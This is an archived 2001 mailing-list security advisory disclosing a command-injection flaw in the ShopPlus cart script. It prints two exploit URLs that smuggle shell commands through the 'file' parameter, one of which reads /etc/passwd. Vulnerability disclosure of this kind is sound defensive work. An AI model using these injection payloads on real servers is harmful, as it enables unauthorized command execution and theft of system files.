------------[ advisory ]------------ name: ShopPlus Cart Bug Information: The ShopPlus shopping cart system allows you to build a store or a mall on the Internet. Because of its flexibility, it allows you to sell virtually any product or services and fully customize the shopping experience of your web site. http://www.ksofttech.com/help/shopplus/ Problem: Script doesnt check symbols. any user can execute commands on webserver. Exploit: host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid| host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| Bug found by Kernel|X| and aLph4Num3ric E-Mail: secureat_private [kernel|x|] alph4num3ricat_private [aLph4Num3ric] WWW: www.russiahack.com / www.tmgroup.sh ------------ Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
This archive was generated by hypermail 2b30 : Wed Sep 05 2001 - 12:34:04 PDT